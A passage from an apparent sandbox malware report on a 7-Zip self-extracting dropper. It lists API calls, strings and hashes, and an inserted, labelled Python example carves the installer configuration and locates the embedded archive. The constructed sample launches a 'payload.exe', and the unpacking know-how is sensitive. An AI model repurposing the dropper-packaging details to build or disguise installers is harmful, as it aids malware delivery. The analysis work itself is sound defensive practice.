                                                                      • ClientToScreen.USER32(?,?), ref: 00407446
                                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                      • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                      • String ID:
                                                                      • API String ID: 747815384-0
                                                                      • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                      • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                      • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                      • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: 0VA$SetEnvironment${\rtf
                                                                      • API String ID: 613200358-2390373888
                                                                      • Opcode ID: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                                      • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                      • Opcode Fuzzy Hash: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                                      • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                      • String ID:
                                                                      • API String ID: 801014965-0
                                                                      • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                      • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                      • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                      • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00407831
                                                                      • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                      • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                      • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                      • GetWindowDC.USER32(?), ref: 00407896
                                                                      • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                      • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                      • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                      Similarity
                                                                      • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                      • String ID:
                                                                      • API String ID: 2586545124-0
                                                                      • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                      • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                      • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                      • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                        • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                      • wsprintfA.USER32 ref: 00403C31
                                                                      • wsprintfA.USER32 ref: 00403C5E
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ??3@$wsprintf
                                                                      • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                      • API String ID: 2704270482-695273242
                                                                      • Opcode ID: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                                      • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                      • Opcode Fuzzy Hash: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                                      • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                      • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                      • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                      • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                      • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                      Similarity
                                                                      • API ID: ItemMessageSend$Focus
                                                                      • String ID:
                                                                      • API String ID: 3946207451-0
                                                                      • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                      • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                      • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                      • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                      • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                      • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$AddressLibraryLoadProc
                                                                      • String ID: hA$SetWindowTheme$uxtheme
                                                                      • API String ID: 324724604-1539679821
                                                                      • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                      • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                      • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                      • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                      • GetDC.USER32(00000000), ref: 004076E7
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                      • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                      Similarity
                                                                      • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                      • String ID:
                                                                      • API String ID: 2693764856-0
                                                                      • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                      • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                      • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                      • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 0040721C
                                                                      • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                      • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                      • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                      • SelectObject.GDI32(?,?), ref: 00407266
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                      • SelectObject.GDI32(?,?), ref: 004072A7
                                                                      • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                      Similarity
                                                                      • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                      • String ID:
                                                                      • API String ID: 2466489532-0
                                                                      • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                      • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                      • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                      • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                      • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                      • wsprintfW.USER32 ref: 0040821E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                      • String ID: %d%%
                                                                      • API String ID: 3753976982-1518462796
                                                                      • Opcode ID: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                                      • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                      • Opcode Fuzzy Hash: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                                      • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                      • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                      • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                      • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                      • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                      Similarity
                                                                      • API ID: DialogThreadTimer$KillResumeSuspend
                                                                      • String ID:
                                                                      • API String ID: 4151135813-0
                                                                      • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                      • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                      • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                      • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%M/$%%M\
                                                                      • API String ID: 613200358-4143866494
                                                                      • Opcode ID: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                                      • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                      • Opcode Fuzzy Hash: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                                      • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%T/$%%T\
                                                                      • API String ID: 613200358-2679640699
                                                                      • Opcode ID: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                                      • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                      • Opcode Fuzzy Hash: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                                      • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%S/$%%S\
                                                                      • API String ID: 613200358-358529586
                                                                      • Opcode ID: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                                      • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                      • Opcode Fuzzy Hash: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                                      • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                      APIs
                                                                      • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                      Similarity
                                                                      • API ID: ExceptionThrow
                                                                      • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                      • API String ID: 432778473-1797977924
                                                                      • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                      • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                      • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                      • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                        • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                        • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                        • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                        • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      Similarity
                                                                      • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                      • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                      • API String ID: 4038993085-372238525
                                                                      • Opcode ID: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                                      • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                      • Opcode Fuzzy Hash: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                                      • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
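The `;!@Install@!UTF-8!` and `;!@InstallEnd@!` literals passed to the function whose calls at 00405543-004055BD are listed above are the markers that 7-Zip's SFX installer modules use to delimit their configuration script (`Key="Value"` lines such as `Title`, `BeginPrompt`, `RunProgram`), and the `%%T`, `%%S`, `%%M` and `%%P` strings handled by the functions at 00403EBC, 00403F77, 00404032 and 004040ED (each in both `/` and `\` spellings) look like the path placeholders that module substitutes at run time. The added example below, which is not code from the sample, from Joe Sandbox or from 7-Zip, carves that config block out of a dropper, parses it, reports which values depend on run-time placeholders, and locates the embedded 7z archive so it can be extracted with a normal 7z client. The function names and the `SAMPLE` bytes are constructed for the example; the key names are standard 7-Zip SFX config keys but the values are invented and say nothing about this sample's real script.

```python
"""Carve and parse a 7-Zip SFX installer configuration block from a dropper.

Added example, not the sample's, Joe Sandbox's or 7-Zip's own code. The marker
strings are the ones 7-Zip's SFX installer modules use; SAMPLE is constructed.
"""
import re
from typing import Dict, List, Optional

CFG_BEGIN = b";!@Install@!UTF-8!"
CFG_END = b";!@InstallEnd@!"
SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # signature at the start of a 7z archive
KV_RE = re.compile(r'^\s*(\w+)\s*=\s*"(.*)"\s*$')
VAR_RE = re.compile(r"%%[A-Za-z]")  # run-time placeholders such as %%T or %%S


def carve_sfx_config(data: bytes) -> Optional[str]:
    """Return the config text between the markers, or None if either is missing."""
    start = data.find(CFG_BEGIN)
    if start < 0:
        return None
    start += len(CFG_BEGIN)
    end = data.find(CFG_END, start)
    if end < 0:
        return None  # truncated or damaged stub: do not guess
    return data[start:end].decode("utf-8", errors="replace")


def parse_sfx_config(text: str) -> Dict[str, str]:
    """Parse Key="Value" lines; a repeated key keeps its last value."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def placeholders(value: str) -> List[str]:
    """The %%X placeholders a value uses, first-seen order, no duplicates.

    Only reports them: what each expands to is decided by the SFX module, so an
    analyst resolves it from the module's behaviour, not from a fixed table.
    """
    seen: List[str] = []
    for tok in VAR_RE.findall(value):
        if tok not in seen:
            seen.append(tok)
    return seen


def find_7z_payload(data: bytes, after: int = 0) -> int:
    """Offset of the embedded 7z archive (-1 if absent); carve from here and list it."""
    return data.find(SEVEN_ZIP_MAGIC, after)


def triage(data: bytes) -> Dict[str, object]:
    """One-shot summary: parsed config, placeholder-dependent values, archive offset."""
    text = carve_sfx_config(data)
    cfg = parse_sfx_config(text) if text is not None else {}
    return {
        "config": cfg,
        "dynamic_values": {k: placeholders(v) for k, v in cfg.items() if placeholders(v)},
        "payload_offset": find_7z_payload(data),
    }


# Constructed stand-in for a dropper: PE stub bytes, the config block, then the archive.
# The key names are standard 7-Zip SFX keys; the values are invented for this example.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + CFG_BEGIN + b"\r\n"
    + b'Title="Update"\r\n'
    + b'BeginPrompt="Install update?"\r\n'
    + b'RunProgram="%%T\\payload.exe -run"\r\n'
    + CFG_END + b"\r\n"
    + SEVEN_ZIP_MAGIC + b"\x00\x04"
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it against the real dropper by replacing `SAMPLE` with the file's bytes; the `RunProgram` value is what the stub launches after extraction, and `dd`/`7z x` from `payload_offset` gives you the dropped files without executing anything.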
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: wsprintf$ExitProcesslstrcat
                                                                      • String ID: 0x%p
                                                                      • API String ID: 2530384128-1745605757
                                                                      • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                      • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                      • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                      • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00407DB6
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                      • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                      Similarity
                                                                      • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                      • String ID: A
                                                                      • API String ID: 1557639607-3554254475
                                                                      • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                      • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                      • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                      • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                      APIs
                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                      • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                      Similarity
                                                                      • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                      • String ID: SetEnvironment
                                                                      • API String ID: 612612615-360490078
                                                                      • Opcode ID: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                                      • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                      • Opcode Fuzzy Hash: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                                      • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                      Similarity
                                                                      • API ID: ??3@$lstrlen
                                                                      • String ID:
                                                                      • API String ID: 2031685711-0
                                                                      • Opcode ID: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                                      • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                      • Opcode Fuzzy Hash: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                                      • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                      APIs
                                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                      Similarity
                                                                      • API ID: MetricsSystem$??3@
                                                                      • String ID: 100%%
                                                                      • API String ID: 2562992111-568723177
                                                                      • Opcode ID: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                                      • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                      • Opcode Fuzzy Hash: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                                      • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                      APIs
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
